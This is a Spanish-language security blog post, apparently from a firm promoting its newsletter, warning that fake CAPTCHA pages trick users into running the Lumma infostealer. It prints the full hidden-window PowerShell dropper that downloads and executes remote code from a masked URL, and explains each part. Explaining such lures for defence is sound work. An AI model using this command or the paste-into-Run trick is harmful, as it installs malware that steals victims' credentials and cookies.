Ciberseguridad

Completa esta CAPTCHA y te ejecutaré un infostealer. 

Home / Ciberseguridad / Completa esta CAPTCHA y te ejecutaré un infostealer. 
CAPTCHA falso de Lumma infostealer utilizado para robar credenciales y datos sensibles

Completa esta CAPTCHA y te ejecutaré un infostealer. 

¿Pensabas que con tener un buen antivirus y no descargar software “libre” te ibas a evitar de un infostealer? 

Lumma es un tipo infostealer que infecta tu equipo con el objetivo de robar credenciales, cookies y demás información vital de tu organización y vida privada. 

Los antivirus en muchas ocasiones no detectan este tipo de malware, siendo un peligro potencial el infectarse con un infostealer. 

Si bien conocemos las maneras convencionales por las cuales se distribuye este tipo de malware por la red, enlaces maliciosos, descargas de software infectado, extensiones de navegadores, phishing, sitios web comprometidos para extender su alcance y evadir la detección por soluciones de seguridad; se detectó otra forma de propagación, que quizás para los usuarios menos expertos, y ajenos a los temas de IT puedan caer en la trampa del CAPTCHA falso. 

Este vector de ataque mediante el uso de una CAPTCHA fraudulenta, implica páginas de verificación falsas que se asemejan a servicios legítimos, a menudo hospedados en plataformas que utilizan las Redes de Entrega de Contenidos (CDN). Estas páginas suelen diseminarse con la frecuencia que se usan CAPTCHA, como Google reCAPTCHA o Cloudflare CAPTCHA, para engañar a los usuarios para que crean que están interactuando con un servicio de confianza. 

¿Como promueven estas páginas falsas de CAPTCHA? 

  • Sitios de descarga de software pirata. 
  • Enlaces para visualizar contenido películas, series, partidos de fútbol, etc. 
  • Contenido para adultos. 
  • Canales de telegram de descargas. 
  • Webs de inversión en criptos, etc. 

Cuando llega el momento de poder disfrutar del contenido deseado, aparece el CAPTCHA malicioso pidiéndote que lo completes, una técnica utilizada por ciertos infostealers. 

Al hacer clic en el botón I-m no un robot /Verify/Copiar, se instruye al usuario para realizar una secuencia inusual: 

  • Abre  Ejecutar (win-R) 
  • Presiona Ctrl-V 
  • Enter 

Sin el conocimiento del usuario, haciendo clic en el botón copia automáticamente un comando PowerShell al portapapeles. Una vez que el usuario pega el comando el apartado de Ejecutar y presiona Enter, el sistema ejecuta el comando. 

“powershell.exe -W Hidden -command $url = ‘https://XXXXXXXXXXX/OOO.txt’; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text” 

  • powershell.exe -W Hidden -command …-W Hidden: ejecuta la ventana de PowerShell en modo oculto, lo que es típico de scripts maliciosos que quieren evitar ser detectados. 
  • $url = ‘https://XXXXXXXXXXX/OOO.txt;   Define una URL desde donde se va a descargar algo. En este caso, un archivo .txt, pero eso no garantiza que sea texto plano. Podría contener código malicioso. 
  • $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content;  Descarga el contenido de esa URL y lo guarda como texto en $text. 
  • iex $text   Ejecuta el contenido descargado con Invoke-Expression, es decir, ejecuta directamente lo que haya dentro del archivo remoto. Esto permite al atacante modificar el payload remoto sin cambiar el dropper local, típico de un infostealer. 

Quieres saber más sobre este proceso de infección…

  • Métodos y técnicas
  • Un análisis sobre una muestra de un infostealer
  • Servidores de comunicación C2 utiliza
  • Algunos IoCs
  • Conclusiones

Suscríbete al newsletter de INTELISOC para acceder al artículo completo (disponible solo por unos días) y mantenerte informado sobre las novedades del sector y nuestros servicios, incluyendo más detalles sobre cómo protegerse contra infostealers.